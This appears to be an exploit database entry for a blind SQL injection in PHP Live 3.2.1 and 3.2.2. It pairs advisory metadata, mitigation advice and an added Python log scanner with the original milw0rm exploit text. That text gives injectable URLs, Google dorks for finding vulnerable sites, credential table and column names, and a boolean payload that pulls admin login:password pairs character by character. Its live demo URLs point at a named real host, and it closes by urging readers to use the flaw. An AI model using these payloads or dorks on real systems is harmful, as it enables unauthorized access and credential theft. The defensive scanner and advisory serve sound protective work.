Vendor: PHP Live
By: boom3rang
CVSS: 7.5 (HIGH)
Type: Blind SQL injection
CWE: 89
Product Name: PHP Live
Affected Version From: 3.2.1
Affected Version To: 3.2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phplivesupport:phplive
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PhpLive 3.2.1/2 (x) Blind SQL injection

PhpLive is vulnerable to blind SQL injection through the ‘l’ and ‘x’ parameters of the ‘message_box.php’ and ‘request.php’ scripts. An attacker who sends crafted SQL in these parameters can gain access to sensitive information such as usernames, passwords, emails, userIDs, and names stored in the ‘chat_admin’ table. The vulnerable versions are v3.2.1 and v3.2.2.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
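
The validation rule above, applied to the two scripts and the `x` parameter named in this advisory and run over web access logs. This is an added example, not part of the original advisory or of PHP Live's code. It assumes a legitimate `x` is a short decimal id (as in the page's `x=1` requests) and Common Log Format input; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameter named in the advisory.
WATCHED_SCRIPTS = {"message_box.php", "request.php"}
# Assumption: a legitimate `x` is a short decimal id, as in the page's x=1 requests.
VALID_X = re.compile(r"[0-9]{1,10}")
# Request field of a Common Log Format line; greedy so unencoded spaces survive.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*) HTTP/[0-9.]+"')

# Constructed sample access-log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /phplive/request.php?l=admin&x=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /phplive/request.php?l=admin&x=1%20AND%201%3D2 HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /phplive/message_box.php?theme=&l=admin&x=1/**/and/**/1=1 HTTP/1.1" 200 530',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?x=abc HTTP/1.1" 200 100',
]


def bad_x_values(target):
    """Return decoded `x` values that fail the allowlist, for watched scripts only."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] not in WATCHED_SCRIPTS:
        return []
    # parse_qs percent-decodes, so encoded and raw payloads are compared alike.
    values = parse_qs(parts.query).get("x", [])
    return [v for v in values if not VALID_X.fullmatch(v)]


def scan(lines):
    """Return (line_number, client, decoded_x) for every request that fails the check."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a parseable request line
        client = line.split(" ", 1)[0]
        for value in bad_x_values(match.group("target")):
            hits.append((number, client, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allowlist belongs in the application before `x` reaches the query, alongside parameterized queries; log matching only reveals probing after the fact.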

Exploit-DB raw data:

  PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X] 
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___        
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \       
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /       
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/        
                                                                           
                                                                         
      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ###################################################################    
    								          
       Author         	: boom3rang		 	                  
       Contact        	: boom3rang[at]live.com                          
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de		          
   -------------------------------------------------------------------    
    								          
                  Affected software description    	                  
       Software 	: PhpLive             	                          
       Vendor		: http://www.phplivesupport.com	                  
       Price 	      	: Live Support Download Starts at $89.95          
       Version Vuln.    : v3.2.1 & v3.2.2			          
   -------------------------------------------------------------------    
    								          
    [~] SQLi :						                  
    								          
    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]           
    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]         	          
      
                                                                   
    [~]Google Dork :		   				                  
    
    Powered by PHP Live! v3.2.1							    
    Powered by PHP Live! v3.2.2  
    allinurl:"request.php" "deptid"						          
    								          
   -------------------------------------------------------------------    
    								          
    [~] Table_NAME  =  chat_admin
    [~] Column_NAME =  login - password - email - userID - name			                  								          
   -------------------------------------------------------------------    
    								          
    [~] Admin Path :					                  
    								          
    http://www.TARGET.com/phplive	
   -------------------------------------------------------------------		                  
    [~] Live Demo:
    
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False

   -------------------------------------------------------------------

    [~] ASCII 

  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48		
      
      False
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127   			
			          
   ============================================================================
   | USE this vulnerability, to improve your skills for Social Engineering  ;)  |
   ============================================================================

# milw0rm.com [2009-07-16]